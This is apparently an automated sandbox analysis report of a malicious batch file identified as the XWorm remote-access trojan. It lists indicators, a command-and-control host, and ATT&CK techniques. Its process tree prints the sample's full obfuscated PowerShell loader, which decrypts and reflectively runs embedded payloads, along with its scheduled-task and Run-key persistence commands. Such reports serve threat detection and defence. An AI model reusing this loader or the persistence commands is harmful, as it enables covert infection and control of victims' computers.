Analysis
-
max time kernel
148s -
max time network
94s -
platform
windows11-21h2_x64 -
resource
win11-20240508-en -
resource tags
arch:x64arch:x86image:win11-20240508-enlocale:en-usos:windows11-21h2-x64system -
submitted
29-06-2024 16:06
Static task
static1
Behavioral task
behavioral1
Sample
XClient.bat
Resource
win10-20240404-en
Behavioral task
behavioral2
Sample
XClient.bat
Resource
win10v2004-20240508-en
Behavioral task
behavioral3
Sample
XClient.bat
Resource
win11-20240508-en
General
-
Target
XClient.bat
-
Size
401KB
-
MD5
ba91ec16f05697b52c5d28f1a250ec71
-
SHA1
02f0502d5270493a302e28c1df808bb29873c109
-
SHA256
886383676ce8cadc259cadd4de3ba03106f012e5084c739d2fdb826b7c2c4c8d
-
SHA512
5b43f4f65559ac9368e6f574e3231fdeff1c81e185a28c44d9e4151fe146298ce2949edf0e1b64724e4d00efc2f80f1517548ea6bc7d9558797bc94fe948001b
-
SSDEEP
12288:XsxR4y6qFoRRh8jDi8gZKLyJ3ToFQBpJ7W5x7B:XN9qFoRRCLmNBLsn
Malware Config
Extracted
xworm
paris-itself.gl.at.ply.gg:49485
-
Install_directory
%Public%
-
install_file
USB.exe
Signatures
-
Detect Xworm Payload 1 IoCs
Processes:
resource yara_rule behavioral3/memory/4048-102-0x0000021F38E40000-0x0000021F38E58000-memory.dmp family_xworm -
Blocklisted process makes network request 2 IoCs
Processes:
powershell.exeflow pid process 2 4048 powershell.exe 4 4048 powershell.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 3 IoCs
Run Powershell and hide display window.
Processes:
powershell.exepowershell.exepowershell.exepid process 1940 powershell.exe 3052 powershell.exe 4048 powershell.exe -
Drops startup file 2 IoCs
Processes:
powershell.exedescription ioc process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\svchost.lnk powershell.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\svchost.lnk powershell.exe -
Executes dropped EXE 1 IoCs
Processes:
svchostpid process 1904 svchost -
Adds Run key to start application 2 TTPs 1 IoCs
Processes:
powershell.exedescription ioc process Set value (str) \REGISTRY\USER\S-1-5-21-3001105534-2705918504-2956618779-1000\Software\Microsoft\Windows\CurrentVersion\Run\svchost = "C:\\Users\\Public\\svchost" powershell.exe -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes:
flow ioc 1 ip-api.com -
Drops file in System32 directory 1 IoCs
Processes:
svchost.exedescription ioc process File opened for modification C:\Windows\System32\Tasks\svchost svchost.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Delays execution with timeout.exe 1 IoCs
Processes:
timeout.exepid process 4568 timeout.exe -
Modifies data under HKEY_USERS 1 IoCs
Processes:
svchost.exedescription ioc process Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections svchost.exe -
Modifies registry class 1 IoCs
Processes:
powershell.exedescription ioc process Key created \REGISTRY\USER\S-1-5-21-3001105534-2705918504-2956618779-1000_Classes\Local Settings powershell.exe -
Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
powershell.exepowershell.exepowershell.exepid process 1940 powershell.exe 1940 powershell.exe 3052 powershell.exe 3052 powershell.exe 4048 powershell.exe 4048 powershell.exe 4048 powershell.exe 4048 powershell.exe 4048 powershell.exe 4048 powershell.exe 4048 powershell.exe 4048 powershell.exe 4048 powershell.exe 4048 powershell.exe 4048 powershell.exe 4048 powershell.exe 4048 powershell.exe 4048 powershell.exe 4048 powershell.exe 4048 powershell.exe 4048 powershell.exe 4048 powershell.exe 4048 powershell.exe 4048 powershell.exe 4048 powershell.exe 4048 powershell.exe 4048 powershell.exe 4048 powershell.exe 4048 powershell.exe 4048 powershell.exe 4048 powershell.exe 4048 powershell.exe 4048 powershell.exe 4048 powershell.exe 4048 powershell.exe 4048 powershell.exe 4048 powershell.exe 4048 powershell.exe 4048 powershell.exe 4048 powershell.exe 4048 powershell.exe 4048 powershell.exe 4048 powershell.exe 4048 powershell.exe 4048 powershell.exe 4048 powershell.exe 4048 powershell.exe 4048 powershell.exe 4048 powershell.exe 4048 powershell.exe 4048 powershell.exe 4048 powershell.exe 4048 powershell.exe 4048 powershell.exe 4048 powershell.exe 4048 powershell.exe 4048 powershell.exe 4048 powershell.exe 4048 powershell.exe 4048 powershell.exe 4048 powershell.exe 4048 powershell.exe 4048 powershell.exe 4048 powershell.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
powershell.exepowershell.exedescription pid process Token: SeDebugPrivilege 1940 powershell.exe Token: SeDebugPrivilege 3052 powershell.exe Token: SeIncreaseQuotaPrivilege 3052 powershell.exe Token: SeSecurityPrivilege 3052 powershell.exe Token: SeTakeOwnershipPrivilege 3052 powershell.exe Token: SeLoadDriverPrivilege 3052 powershell.exe Token: SeSystemProfilePrivilege 3052 powershell.exe Token: SeSystemtimePrivilege 3052 powershell.exe Token: SeProfSingleProcessPrivilege 3052 powershell.exe Token: SeIncBasePriorityPrivilege 3052 powershell.exe Token: SeCreatePagefilePrivilege 3052 powershell.exe Token: SeBackupPrivilege 3052 powershell.exe Token: SeRestorePrivilege 3052 powershell.exe Token: SeShutdownPrivilege 3052 powershell.exe Token: SeDebugPrivilege 3052 powershell.exe Token: SeSystemEnvironmentPrivilege 3052 powershell.exe Token: SeRemoteShutdownPrivilege 3052 powershell.exe Token: SeUndockPrivilege 3052 powershell.exe Token: SeManageVolumePrivilege 3052 powershell.exe Token: 33 3052 powershell.exe Token: 34 3052 powershell.exe Token: 35 3052 powershell.exe Token: 36 3052 powershell.exe Token: SeIncreaseQuotaPrivilege 3052 powershell.exe Token: SeSecurityPrivilege 3052 powershell.exe Token: SeTakeOwnershipPrivilege 3052 powershell.exe Token: SeLoadDriverPrivilege 3052 powershell.exe Token: SeSystemProfilePrivilege 3052 powershell.exe Token: SeSystemtimePrivilege 3052 powershell.exe Token: SeProfSingleProcessPrivilege 3052 powershell.exe Token: SeIncBasePriorityPrivilege 3052 powershell.exe Token: SeCreatePagefilePrivilege 3052 powershell.exe Token: SeBackupPrivilege 3052 powershell.exe Token: SeRestorePrivilege 3052 powershell.exe Token: SeShutdownPrivilege 3052 powershell.exe Token: SeDebugPrivilege 3052 powershell.exe Token: SeSystemEnvironmentPrivilege 3052 powershell.exe Token: SeRemoteShutdownPrivilege 3052 powershell.exe Token: SeUndockPrivilege 3052 powershell.exe Token: SeManageVolumePrivilege 3052 powershell.exe Token: 33 3052 powershell.exe Token: 34 3052 powershell.exe Token: 35 3052 powershell.exe Token: 36 3052 powershell.exe Token: SeIncreaseQuotaPrivilege 3052 powershell.exe Token: SeSecurityPrivilege 3052 powershell.exe Token: SeTakeOwnershipPrivilege 3052 powershell.exe Token: SeLoadDriverPrivilege 3052 powershell.exe Token: SeSystemProfilePrivilege 3052 powershell.exe Token: SeSystemtimePrivilege 3052 powershell.exe Token: SeProfSingleProcessPrivilege 3052 powershell.exe Token: SeIncBasePriorityPrivilege 3052 powershell.exe Token: SeCreatePagefilePrivilege 3052 powershell.exe Token: SeBackupPrivilege 3052 powershell.exe Token: SeRestorePrivilege 3052 powershell.exe Token: SeShutdownPrivilege 3052 powershell.exe Token: SeDebugPrivilege 3052 powershell.exe Token: SeSystemEnvironmentPrivilege 3052 powershell.exe Token: SeRemoteShutdownPrivilege 3052 powershell.exe Token: SeUndockPrivilege 3052 powershell.exe Token: SeManageVolumePrivilege 3052 powershell.exe Token: 33 3052 powershell.exe Token: 34 3052 powershell.exe Token: 35 3052 powershell.exe -
Suspicious use of SetWindowsHookEx 1 IoCs
Processes:
powershell.exepid process 4048 powershell.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
cmd.exepowershell.exeWScript.execmd.exepowershell.exedescription pid process target process PID 4912 wrote to memory of 5076 4912 cmd.exe cmd.exe PID 4912 wrote to memory of 5076 4912 cmd.exe cmd.exe PID 4912 wrote to memory of 1940 4912 cmd.exe powershell.exe PID 4912 wrote to memory of 1940 4912 cmd.exe powershell.exe PID 1940 wrote to memory of 3052 1940 powershell.exe powershell.exe PID 1940 wrote to memory of 3052 1940 powershell.exe powershell.exe PID 1940 wrote to memory of 4208 1940 powershell.exe WScript.exe PID 1940 wrote to memory of 4208 1940 powershell.exe WScript.exe PID 4208 wrote to memory of 4836 4208 WScript.exe cmd.exe PID 4208 wrote to memory of 4836 4208 WScript.exe cmd.exe PID 4836 wrote to memory of 2304 4836 cmd.exe cmd.exe PID 4836 wrote to memory of 2304 4836 cmd.exe cmd.exe PID 4836 wrote to memory of 4048 4836 cmd.exe powershell.exe PID 4836 wrote to memory of 4048 4836 cmd.exe powershell.exe PID 4048 wrote to memory of 3144 4048 powershell.exe Explorer.EXE PID 4048 wrote to memory of 984 4048 powershell.exe svchost.exe PID 4048 wrote to memory of 1968 4048 powershell.exe svchost.exe PID 4048 wrote to memory of 2648 4048 powershell.exe svchost.exe PID 4048 wrote to memory of 1172 4048 powershell.exe svchost.exe PID 4048 wrote to memory of 2548 4048 powershell.exe svchost.exe PID 4048 wrote to memory of 3556 4048 powershell.exe svchost.exe PID 4048 wrote to memory of 752 4048 powershell.exe svchost.exe PID 4048 wrote to memory of 2836 4048 powershell.exe svchost.exe PID 4048 wrote to memory of 1724 4048 powershell.exe svchost.exe PID 4048 wrote to memory of 932 4048 powershell.exe svchost.exe PID 4048 wrote to memory of 1260 4048 powershell.exe svchost.exe PID 4048 wrote to memory of 1700 4048 powershell.exe svchost.exe PID 4048 wrote to memory of 2012 4048 powershell.exe svchost.exe PID 4048 wrote to memory of 1492 4048 powershell.exe svchost.exe PID 4048 wrote to memory of 700 4048 powershell.exe svchost.exe PID 4048 wrote to memory of 2668 4048 powershell.exe svchost.exe PID 4048 wrote to memory of 2076 4048 powershell.exe svchost.exe PID 4048 wrote to memory of 2268 4048 powershell.exe svchost.exe PID 4048 wrote to memory of 3572 4048 powershell.exe svchost.exe PID 4048 wrote to memory of 1276 4048 powershell.exe svchost.exe PID 4048 wrote to memory of 3440 4048 powershell.exe svchost.exe PID 4048 wrote to memory of 1852 4048 powershell.exe svchost.exe PID 4048 wrote to memory of 1788 4048 powershell.exe svchost.exe PID 4048 wrote to memory of 1072 4048 powershell.exe svchost.exe PID 4048 wrote to memory of 2252 4048 powershell.exe svchost.exe PID 4048 wrote to memory of 2640 4048 powershell.exe svchost.exe PID 4048 wrote to memory of 1056 4048 powershell.exe svchost.exe PID 4048 wrote to memory of 3416 4048 powershell.exe svchost.exe PID 4048 wrote to memory of 2036 4048 powershell.exe svchost.exe PID 4048 wrote to memory of 1444 4048 powershell.exe svchost.exe PID 4048 wrote to memory of 4788 4048 powershell.exe svchost.exe PID 4048 wrote to memory of 2028 4048 powershell.exe svchost.exe PID 4048 wrote to memory of 2808 4048 powershell.exe svchost.exe PID 4048 wrote to memory of 1820 4048 powershell.exe svchost.exe PID 4048 wrote to memory of 1620 4048 powershell.exe svchost.exe PID 4048 wrote to memory of 1412 4048 powershell.exe svchost.exe PID 4048 wrote to memory of 2788 4048 powershell.exe svchost.exe PID 4048 wrote to memory of 1604 4048 powershell.exe svchost.exe PID 4048 wrote to memory of 1800 4048 powershell.exe svchost.exe PID 4048 wrote to memory of 4360 4048 powershell.exe svchost.exe PID 4048 wrote to memory of 3960 4048 powershell.exe svchost.exe PID 4048 wrote to memory of 804 4048 powershell.exe svchost.exe PID 4048 wrote to memory of 1196 4048 powershell.exe svchost.exe PID 4048 wrote to memory of 2180 4048 powershell.exe svchost.exe PID 4048 wrote to memory of 992 4048 powershell.exe svchost.exe PID 4048 wrote to memory of 1188 4048 powershell.exe svchost.exe PID 4048 wrote to memory of 2760 4048 powershell.exe svchost.exe PID 4048 wrote to memory of 3612 4048 powershell.exe schtasks.exe PID 4048 wrote to memory of 3612 4048 powershell.exe schtasks.exe -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k DcomLaunch -p1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k RPCSS -p1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNoNetwork -p1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule1⤵
- Drops file in System32 directory
-
C:\Users\Public\svchostC:\Users\Public\svchost2⤵
- Executes dropped EXE
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s nsi1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netprofm -p -s netprofm1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netsvcs -p -s Themes1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s SENS1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkService -p1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNoNetworkFirewall -p1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkService -p1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService1⤵
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\XClient.bat"2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('YnSWh2kl5il3EMjntzhV8DXjrMsXq1qvsxGC5bVHd4g='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('OdoCVEiT8kRX1L6TbGv11A=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $zTNzi=New-Object System.IO.MemoryStream(,$param_var); $hXjuc=New-Object System.IO.MemoryStream; $naMQO=New-Object System.IO.Compression.GZipStream($zTNzi, [IO.Compression.CompressionMode]::Decompress); $naMQO.CopyTo($hXjuc); $naMQO.Dispose(); $zTNzi.Dispose(); $hXjuc.Dispose(); $hXjuc.ToArray();}function execute_function($param_var,$param2_var){ $plvam=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $kLZRH=$plvam.EntryPoint; $kLZRH.Invoke($null, $param2_var);}$ZnpwU = 'C:\Users\Admin\AppData\Local\Temp\XClient.bat';$host.UI.RawUI.WindowTitle = $ZnpwU;$zIJcx=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($ZnpwU).Split([Environment]::NewLine);foreach ($vIuJs in $zIJcx) { if ($vIuJs.StartsWith('KSgXqCUIyvjlHChvQmvc')) { $FzXsd=$vIuJs.Substring(20); break; }}$payloads_var=[string[]]$FzXsd.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); "3⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden3⤵
- Command and Scripting Interpreter: PowerShell
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName '$phantom-RuntimeBroker_startup_87_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\$phantom-startup_str_87.vbs') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\$phantom-startup_str_87.vbs"4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\$phantom-startup_str_87.bat" "5⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('YnSWh2kl5il3EMjntzhV8DXjrMsXq1qvsxGC5bVHd4g='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('OdoCVEiT8kRX1L6TbGv11A=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $zTNzi=New-Object System.IO.MemoryStream(,$param_var); $hXjuc=New-Object System.IO.MemoryStream; $naMQO=New-Object System.IO.Compression.GZipStream($zTNzi, [IO.Compression.CompressionMode]::Decompress); $naMQO.CopyTo($hXjuc); $naMQO.Dispose(); $zTNzi.Dispose(); $hXjuc.Dispose(); $hXjuc.ToArray();}function execute_function($param_var,$param2_var){ $plvam=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $kLZRH=$plvam.EntryPoint; $kLZRH.Invoke($null, $param2_var);}$ZnpwU = 'C:\Users\Admin\AppData\Roaming\$phantom-startup_str_87.bat';$host.UI.RawUI.WindowTitle = $ZnpwU;$zIJcx=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($ZnpwU).Split([Environment]::NewLine);foreach ($vIuJs in $zIJcx) { if ($vIuJs.StartsWith('KSgXqCUIyvjlHChvQmvc')) { $FzXsd=$vIuJs.Substring(20); break; }}$payloads_var=[string[]]$FzXsd.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); "6⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden6⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Drops startup file
- Adds Run key to start application
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\schtasks.exe"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "svchost" /tr "C:\Users\Public\svchost"7⤵
- Scheduled Task/Job: Scheduled Task
-
C:\Windows\System32\schtasks.exe"C:\Windows\System32\schtasks.exe" /delete /f /tn "svchost"7⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmpA94B.tmp.bat""7⤵
-
C:\Windows\system32\timeout.exetimeout 38⤵
- Delays execution with timeout.exe
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k UdkSvcGroup -s UdkUserSvc1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k osprivacy -p -s camsvc1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s SSDPSRV1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc1⤵
- Modifies data under HKEY_USERS
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager1⤵
Network
MITRE ATT&CK Matrix ATT&CK v13
Execution
Command and Scripting Interpreter
1PowerShell
1Scheduled Task/Job
1Scheduled Task
1Persistence
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Scheduled Task/Job
1Scheduled Task
1Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.logFilesize
3KB
MD5df472dcddb36aa24247f8c8d8a517bd7
SHA16f54967355e507294cbc86662a6fbeedac9d7030
SHA256e4e0fbc974e6946d20ddfaf22c543fccc4662d28e30530ec710fec149958f9b6
SHA51206383259258a8c32f676ddaf7ea1fec3de7318ff1338f022e03c6b33458f2ce708e073ceb1aa26e3cf37f82dac37c8163b8ebd2de56b8530dffe177845c7adca
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCacheFilesize
62KB
MD5e566632d8956997225be604d026c9b39
SHA194a9aade75fffc63ed71404b630eca41d3ce130e
SHA256b7f66a3543488b08d8533f290eb5f2df7289531934e6db9c346714cfbf609cf0
SHA512f244eb419eef0617cd585002e52c26120e57fcbadc37762c100712c55ff3c29b0f3991c2ffa8eefc4080d2a8dbfa01b188250ea440d631efed358e702cc3fecd
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-InteractiveFilesize
1KB
MD53ec0d76d886b2f4b9f1e3da7ce9e2cd7
SHA168a6a2b7b0fa045cd9cf7d63d4e30600a7b25dea
SHA256214be9e8293b00fc05089068033edb41da350e0f127dd782bf6cb748000a56a5
SHA512a49d758d03e3a7bc38be29d577c3e0d0c69eb08d0496a81b9406b446c5808d7dfbab39c5be3b45cbb4aec511d87c6166453cbd12cebe5d8663a60b5d773206c6
-
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_2cwk0mb3.x35.ps1Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
C:\Users\Admin\AppData\Local\Temp\tmpA94B.tmp.batFilesize
171B
MD57a40b3cbfe54feb87373b2f6f7f4e913
SHA121f3b1056685448191bd53a92e9f75cdafc1da08
SHA2564357816375d060f0bd1568b460c946a825a88b965b38a88b7802930c2e0c5501
SHA51240a3258506e41c7db56a0ad9de67520fae3960d86745eb6caedf2180b586c538ec5979461116ca95c1c730ba3a1be5d48f403a71d2759f85220bbc9242e99ae2
-
C:\Users\Admin\AppData\Roaming\$phantom-startup_str_87.batFilesize
401KB
MD5ba91ec16f05697b52c5d28f1a250ec71
SHA102f0502d5270493a302e28c1df808bb29873c109
SHA256886383676ce8cadc259cadd4de3ba03106f012e5084c739d2fdb826b7c2c4c8d
SHA5125b43f4f65559ac9368e6f574e3231fdeff1c81e185a28c44d9e4151fe146298ce2949edf0e1b64724e4d00efc2f80f1517548ea6bc7d9558797bc94fe948001b
-
C:\Users\Admin\AppData\Roaming\$phantom-startup_str_87.vbsFilesize
123B
MD56a106b5df4530d40fd00bc8b806ebff6
SHA1fafee4fd7d92c876387e854764274f90ea6d2b38
SHA256045ccfdbfabbdca68f2efaaa2eb1d73ee530fd30bc39f200df5f4a94cf152bac
SHA512e3ed771324cda75f70208e988177ec1f39e9f359f0fe1b771d267d73db41351e8f45a2cb42b9f0dc93349311e09d07fa44a132bb9eb40e8e9cb108ea24890552
-
C:\Users\Public\svchostFilesize
440KB
MD50e9ccd796e251916133392539572a374
SHA1eee0b7e9fdb295ea97c5f2e7c7ba3ac7f4085204
SHA256c7d4e119149a7150b7101a4bd9fffbf659fba76d058f7bf6cc73c99fb36e8221
SHA512e15c3696e2c96874242d3b0731ce0c790387ccce9a83a19634aed4d1efef72ce8b8fa683069950d652b16cd8d5e9daae9910df6d0a75cb74fdbe90ae5186765d
-
memory/984-53-0x00007FFBF2FF0000-0x00007FFBF3000000-memory.dmpFilesize
64KB
-
memory/1172-58-0x00007FFBF2FF0000-0x00007FFBF3000000-memory.dmpFilesize
64KB
-
memory/1412-103-0x00007FFBF2FF0000-0x00007FFBF3000000-memory.dmpFilesize
64KB
-
memory/1604-111-0x00007FFBF2FF0000-0x00007FFBF3000000-memory.dmpFilesize
64KB
-
memory/1788-109-0x00007FFBF2FF0000-0x00007FFBF3000000-memory.dmpFilesize
64KB
-
memory/1940-14-0x000001CCA67A0000-0x000001CCA67A8000-memory.dmpFilesize
32KB
-
memory/1940-9-0x000001CCA6750000-0x000001CCA6772000-memory.dmpFilesize
136KB
-
memory/1940-15-0x000001CCA6B70000-0x000001CCA6BBE000-memory.dmpFilesize
312KB
-
memory/1940-13-0x000001CCA6BC0000-0x000001CCA6C06000-memory.dmpFilesize
280KB
-
memory/1940-10-0x00007FFC12110000-0x00007FFC12BD2000-memory.dmpFilesize
10.8MB
-
